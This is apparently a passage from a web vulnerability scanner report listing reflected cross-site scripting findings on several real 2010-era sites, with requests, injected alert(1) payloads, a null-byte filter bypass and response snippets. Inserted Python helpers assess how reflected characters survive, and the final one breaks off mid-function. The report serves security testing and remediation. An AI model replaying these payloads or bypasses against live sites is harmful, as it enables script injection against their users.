GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30b2e1a"><script>alert(1)</script>f81de3072b1&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30b2e1a"><script>alert(1)</script>f81de3072b1&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

2.177. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d810"><script>alert(1)</script>4269b9b1148 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304d810"><script>alert(1)</script>4269b9b1148&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304d810"><script>alert(1)</script>4269b9b1148&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.178. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13436"><script>alert(1)</script>8ee759e7141 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px13436"><script>alert(1)</script>8ee759e7141&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px13436"><script>alert(1)</script>8ee759e7141&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.179. http://js.revsci.net/gateway/gw.js [bpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed51'%3balert(1)//60b188e2c5e was submitted in the bpid parameter. This input was echoed as 4ed51';alert(1)//60b188e2c5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S02784ed51'%3balert(1)//60b188e2c5e HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Nov 2010 00:21:33 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Nov 2010 00:21:33 GMT
Connection: close
Content-Length: 6346

//Vermont-12.4.0-967
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba=
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e');else DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.180. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e12c1<script>alert(1)</script>25550789a86 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610e12c1<script>alert(1)</script>25550789a86&bpid=S0278 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Nov 2010 00:21:33 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Nov 2010 00:21:32 GMT
Connection: close
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610E12C1<SCRIPT>ALERT(1)</SCRIPT>25550789A86" was not recognized.
*/

2.181. http://kelvinluck.com/assets/jquery/jScrollPane/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kelvinluck.com
Path:   /assets/jquery/jScrollPane/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2103e<script>alert(1)</script>7435dca659c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/ HTTP/1.1
Host: kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 22:27:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 14 Nov 2010 22:27:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nothing found for
...[SNIP]...
<strong>http://www.kelvinluck.com/assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/</strong>
...[SNIP]...

2.182. http://kelvinluck.com/assets/jquery/jScrollPane/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kelvinluck.com
Path:   /assets/jquery/jScrollPane/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44196"><script>alert(1)</script>3ac3dc6d2a9 was submitted in the REST URL parameter 3. This input was echoed as 44196\"><script>alert(1)</script>3ac3dc6d2a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jquery/jScrollPane44196"><script>alert(1)</script>3ac3dc6d2a9/ HTTP/1.1
Host: kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 14 Nov 2010 22:27:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nothing found for
...[SNIP]...
<a href="http://2005.kelvinluck.com/assets/jquery/jScrollPane44196\"><script>alert(1)</script>3ac3dc6d2a9/">
...[SNIP]...

2.183. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://manufacturing.careerbuilder.com
Path:   /mf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a78f'-alert(1)-'2c61d5b8e89 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mf.ic/Florida_Miami/?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 200489
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=31c8a9168a324c7db86d4832c28fda33-343071021-R7-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650DB6131B087A38A47B2E951820C5AC2CC5B2E82D3899943FBB7C47BC6A3F46E8B7A2166EDA22B2B1E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:30:21 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:45:21 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL7
Date: Sun, 14 Nov 2010 22:30:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.184. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manufacturing.careerbuilder.com
Path:   /mf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f03f"%20a%3db%206b20fd7d40 was submitted in the lr parameter. This input was echoed as 4f03f" a=b 6b20fd7d40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mf.ic/Florida_Miami/?lr=cbcb_mh4f03f"%20a%3db%206b20fd7d40&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 198344
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=8304050d6cf8407c811aa470d8e5f6d1-343070998-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B9DECA71415B4B344AA0626B957297F05C7D9A2F0F944124DD6C01CE730577B3DB3E25B34023B418; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:29:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh4f03f" a=b 6b20fd7d40" />
...[SNIP]...

2.185. http://nl.newsbank.com/nl-search/we/Archives [p_theme parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.newsbank.com
Path:   /nl-search/we/Archives

Issue detail

The value of the p_theme request parameter is copied into the HTML document as plain text between tags. The payload %008ed0e<script>alert(1)</script>d58813ac31b was submitted in the p_theme parameter. This input was echoed as 8ed0e<script>alert(1)</script>d58813ac31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /nl-search/we/Archives?p_multi=EN|&p_product=EN&p_theme=realcities2%008ed0e<script>alert(1)</script>d58813ac31b&p_action=search&p_maxdocs=200&s_site=miami&s_trackval=MH&p_text_search-0= HTTP/1.1
Host: nl.newsbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:11 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: Basic realm="NewsLibrary"
Set-Cookie: JServSessionIdnewslib=1vo0qd5xz1.JS58a; path=/
Connection: close
Content-Type: text/html
Content-Length: 247

com.newsbank.util.NException: misc stylesheet processing on /raid/excal-common/stylesheets/Archives/realcities2.8ed0e<script>alert(1)</script>d58813ac31b/error.xslt: com.newsbank.xml.NXSLCacheException: getXSLTSheet: java.lang.NullPointerException

2.186. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://nonprofit.careerbuilder.com
Path:   /np.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c59"%20a%3db%205eb6f2d6390 was submitted in the lr parameter. This input was echoed as 44c59" a=b 5eb6f2d6390 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
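Working out what a "Firm" attribute-injection finding actually allows is the manual step this text asks for. The helper below is added here and is not part of the report: it does the comparison the scanner does, pulling the text between the random markers out of a response, recording how each special character came back (unmodified, entity-encoded, backslash-escaped or stripped) and turning that into a verdict for a double-quoted attribute context. The sample bodies are the reflected lines from issues 2.186, 2.191 and 2.201 of this report; find_reflections, classify_chars, attribute_verdict and the verdict strings are the example's own.

```python
import re

# Alternative spellings an application might use when it does encode a character.
ENTITY_FORMS = {
    '"': ("&quot;", "&#34;", "&#x22;"),
    "'": ("&#39;", "&#x27;", "&apos;"),
    "<": ("&lt;", "&#60;", "&#x3c;"),
    ">": ("&gt;", "&#62;", "&#x3e;"),
    "&": ("&amp;", "&#38;", "&#x26;"),
}


def find_reflections(body: str, prefix: str, suffix: str) -> list:
    """Return the text between every occurrence of the scanner's random prefix and
    suffix markers. The markers are alphanumeric, so they survive whatever the
    application does to the special characters between them."""
    pattern = re.escape(prefix) + r"(.*?)" + re.escape(suffix)
    return re.findall(pattern, body, re.S)


def classify_chars(sent: str, echoed: str) -> dict:
    """For each distinct non-alphanumeric character in the sent payload, report how
    it came back: unmodified, entity-encoded, backslash-escaped or stripped."""
    result = {}
    for c in dict.fromkeys(ch for ch in sent if not ch.isalnum()):
        if "\\" + c in echoed:
            result[c] = "backslash-escaped"
        elif c in echoed:
            result[c] = "unmodified"
        elif any(form in echoed.lower() for form in ENTITY_FORMS.get(c, ())):
            result[c] = "entity-encoded"
        else:
            result[c] = "stripped"
    return result


def attribute_verdict(quote: str, survived: dict) -> str:
    """Interpret classify_chars() output for a value reflected inside an attribute
    delimited by `quote`. A backslash before the quote is not an escape in HTML,
    so a backslash-escaped quote still terminates the attribute value."""
    if survived.get(quote) not in ("unmodified", "backslash-escaped"):
        return "confined: delimiter encoded or stripped, value stays inside the attribute"
    lt, gt = survived.get("<"), survived.get(">")
    if lt == "unmodified" and gt == "unmodified":
        return "tag breakout: new elements can be injected"
    if lt is None or gt is None:
        return "attribute injection confirmed; angle brackets not probed yet"
    return "attribute injection only: angle brackets filtered, try attribute-based vectors"


# Constructed samples: (prefix, suffix, decoded payload between the markers,
# reflected line copied from the corresponding issue in this report).
SAMPLES = {
    "2.186": ("44c59", "5eb6f2d6390", '" a=b ',
              '<input name="lr" type="hidden" value="cbcb_mh44c59" a=b 5eb6f2d6390" />'),
    "2.191": ("f284b", "34bce5358bd", '"><script>alert(1)</script>',
              '<input id="keywords" type="text" name="keywords" '
              'value="f284b"><script>alert(1)</script>34bce5358bd" >'),
    "2.201": ("84964", "ffc48037882", '"><script>alert(1)</script>',
              '<a href="http://tlight2-niqwf.aacehardware.info/tag/'
              'Special+Sales+Bear+bear84964\\"><script>alert(1)</script>ffc48037882/">'),
}


def analyse(sample_id: str) -> tuple:
    """Run the three steps on one sample: (echoed strings, per-character fate, verdict)."""
    prefix, suffix, sent, body = SAMPLES[sample_id]
    echoed = find_reflections(body, prefix, suffix)
    survived = classify_chars(sent, echoed[0])
    return echoed, survived, attribute_verdict('"', survived)


if __name__ == "__main__":
    for sid in SAMPLES:
        echoed, survived, verdict = analyse(sid)
        print(sid, repr(echoed[0]), survived, "->", verdict)
```

For 2.186 the probe proves only that the quote, a space and an equals sign survive, so the next manual step is to send < and > on their own and, if those are filtered, to try vectors that need no angle brackets (event-handler attributes). Bear in mind that the reflection point here is an input of type hidden, which is not rendered and receives no ordinary mouse or focus events, so exploitability of an attribute-only injection on it is browser-dependent and must be confirmed by hand.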

Request

GET /np.ic/Florida_Miami/?lr=cbcb_mh44c59"%20a%3db%205eb6f2d6390&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 192802
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=c08c85f0ab084f8f980cf516a8699a49-343071164-wr-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B3A9AEF8176FA9165F0DC617B8A41DBB4614ECA2B5399C5087ECC6D8DD45EEFD09EDB9641CDD258A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:43 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:44 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 22:32:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh44c59" a=b 5eb6f2d6390" />
...[SNIP]...

2.187. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nonprofit.careerbuilder.com
Path:   /np.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c4b0'-alert(1)-'e1cb828b728 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
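The line quoted in the response below is the classic shape of this problem: the lr value is dropped into a single-quoted JavaScript string literal, so a single quote in the value ends the literal and whatever follows is parsed as code. The example here is added to the report and is not CareerBuilder's code: it rebuilds that line from the raw parameter, then shows the two-layer fix to apply when the data cannot be moved out of the script block, URL-encoding the value for the query string it lives in and emitting the whole URL as a JavaScript string literal via json.dumps with <, > and & escaped as well. A small tokenizer (also the example's own) checks whether any code ended up between two string literals, which is the test for a successful break-out.

```python
import json
from urllib.parse import quote

REGISTER_BASE = "https://www.careerbuilder.com/Share/Register.aspx?lr="


def render_register_url(lr: str) -> str:
    """Vulnerable rendering, modelled on the reflected line in the response: the raw
    parameter is concatenated into a single-quoted JavaScript string literal."""
    return f"CB.AJAX.Login._registerURL = '{REGISTER_BASE}{lr}&ff=21';"


def js_string_literal(value: str) -> str:
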